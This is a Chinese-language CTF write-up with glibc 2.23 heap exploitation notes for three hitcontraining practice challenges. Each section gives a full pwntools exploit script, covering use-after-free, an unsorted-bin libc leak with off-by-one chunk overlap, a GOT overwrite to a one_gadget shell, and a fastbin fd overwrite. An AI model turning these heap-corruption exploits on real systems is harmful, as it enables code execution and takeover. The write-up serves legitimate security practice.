Glibc Heap Exploit 坐牢笔记 - 0x04

(Updated: )
Heap
,

# Glibc Heap Exploit 坐牢笔记 - 0x04

# UAF

# hitcontraining_uaf

uaf 直接秒了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#patchelf --set-interpreter /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-2.23.so --replace-needed libc.so.6 /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6 pwn
from pwn import*

context.log_level='debug'
context(arch='amd64',os='linux')
context.terminal=['tmux','splitw','-h']

pwn = './hacknote'
p=remote('node5.buuoj.cn',29733)
# p=process(['./ld-2.23.so', pwn], env={"LD_PRELOAD":'./libc-2.23.so'})
# p=process('./hacknote')
# gdb.attach(p)
#elf=ELF(pwn)
#libc=ELF('./libc.so.6')

def add(sizd,con):
    p.sendlineafter("Your choice :","1")
    p.sendlineafter("Note size :",str(sizd))
    p.sendlineafter("Content :",con)
def dele(idx):
    p.sendlineafter("Your choice :","2")
    p.sendlineafter("Index :",str(idx))
def show(idx):
    p.sendlineafter("Your choice :","3")
    p.sendlineafter("Index :",str(idx))

# 0~4
add(0x20,'') #0 a1-a2
add(0x20,'') #1 b1-b2

# dele(0)
dele(1)
dele(0)

add(8,p64(0x8048945)) #2 a1-b1

show(0)

p.interactive()

# Unsorted Bin Attack + Off By One

# hitcontraining_heapcreator

利用 Unsorted Bin 里面只有一个 chunk 的时候,这个 chunk 的 fd 和 bk 都是指向 main_arena 的固定偏移位置的 “特性”,可以泄露出 libc 基址,从而得到 one_gadget 的地址,也可以得到 system 函数的地址。
之后利用 Off_by_One 修改 free 的 chunk 的大小再 malloc 他,就可以得到覆盖在之后的 chunk 之上的大 chunk,因此修改这个 chunk 就相当于修改了他覆盖的 chunk,因此我们把保存存储内容的 chunk 的地址的 chunk 记录的地址改为 atoi () 的 got 表地址,修改这个 chunk 记录的地址就相当于修改 atoi () 的 got 表。(修改 hook 也是可以的,但是我懒得找偏移了。)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#patchelf --set-interpreter /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-2.23.so --replace-needed libc.so.6 /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6 pwn
from pwn import*

context.log_level='debug'
context(arch='amd64',os='linux')
context.terminal=['tmux','splitw','-h']

pwn = './heapcreator'
# p=remote('node5.buuoj.cn',27905)
p=process(['./ld-2.23.so', pwn], env={"LD_PRELOAD":'./libc-2.23.so'})
# p=process('./heapcreator')
# gdb.attach(p)
#elf=ELF(pwn)
#libc=ELF('./libc.so.6')
# puts("--------------------------------");
#   puts("          Heap Creator          ");
#   puts("--------------------------------");
#   puts(" 1. Create a Heap               ");
#   puts(" 2. Edit a Heap                 ");
#   puts(" 3. Show a Heap                 ");
#   puts(" 4. Delete a Heap               ");
#   puts(" 5. Exit                        ");
#   puts("--------------------------------");

def add(size,con):
    p.sendlineafter("Your choice :","1")
    p.sendlineafter("Size of Heap : ",str(size))
    p.sendafter("Content of heap:",con)
def edit(idx,con):
    p.sendlineafter("Your choice :","2")
    p.sendlineafter("Index :",str(idx))
    p.sendafter("Content of heap : ",con)
def show(idx):
    p.sendlineafter("Your choice :","3")
    p.sendlineafter("Index :",str(idx))
def dele(idx):
    p.sendlineafter("Your choice :","4")
    p.sendlineafter("Index :",str(idx))

add(0x108,b'a')#0
add(0x58,b'a') #1
dele(0)
add(0x108,b'abcddcba')#0
show(0)

p.recvuntil(b'abcddcba')
base=u64(p.recv(6)+b'\x00\x00')-(0x00007f03883c3b78-0x7f0388000000)
execv=base+0xf0897
hook=base+0x11451 #fake
print(base)
# hack--->
# gdb.attach(p)
add(0x18,b'a') #2
dele(2)
add(0x28,b'a') #2
add(0xf8,b'a') #3
add(0x18,b'a') #4
dele(3)
edit(2,p64(0)*5+b'\xf1')
add(0x1e8,b'a') #3
edit(3,b'a'*0xf8+p64(0x21)+p64(0x21)+p64(0x602060))
edit(4,p64(execv))

print(base)

p.interactive()

# akyoi@AkyOI-VM:~/PWN/Heap$ one_gadget libc-2.23.so
# 0x4525a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL || {[rsp+0x30], [rsp+0x38], [rsp+0x40], [rsp+0x48], ...} is a valid argv

# 0xef9f4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL || {[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...} is a valid argv

# 0xf0897 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL || {[rsp+0x70], [rsp+0x78], [rsp+0x80], [rsp+0x88], ...} is a valid argv
# akyoi@AkyOI-VM:~/PWN/Heap$

# Fastbin Attack

# hitcontraining_magicheap

修改一个全局变量大于一个数值就行了。fastbin attack 修改 fd 就行了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#patchelf --set-interpreter /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-2.23.so --replace-needed libc.so.6 /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6 pwn
from pwn import*

context.log_level='debug'
context(arch='amd64',os='linux')
context.terminal=['tmux','splitw','-h']

pwn = './magicheap'
# p=remote('node5.buuoj.cn',26983)
p=process(['./ld-2.23.so', pwn], env={"LD_PRELOAD":'./libc-2.23.so'})
# p=process('./magicheap')
gdb.attach(p)
#elf=ELF(pwn)
#libc=ELF('./libc.so.6')

def add(size,con):
    p.sendlineafter("Your choice :","1")
    p.sendlineafter("Size of Heap : ",str(size))
    p.sendlineafter("Content of heap:",con)
def edit(idx,con):
    p.sendlineafter("Your choice :","2")
    p.sendlineafter("Index :",str(idx))
    p.sendlineafter("Size of Heap : ",str(len(con)))
    p.sendlineafter("Content of heap : ",con)
def dele(idx):
    p.sendlineafter("Your choice :","3")
    p.sendlineafter("Index :",str(idx))
def hack():
    p.sendlineafter("Your choice :","4869")

add(0x10,b'a') #0
add(0x60,b'a') #1
add(0x10,b'a') #2

dele(1)
edit(0,p64(0)*3+p64(0x71)+p64(0x60208d))  # size 0x602095     b'a'*10+p64(num)

add(0x60,b'a')
add(0x60,p64(0x114514))

hack()
p.interactive()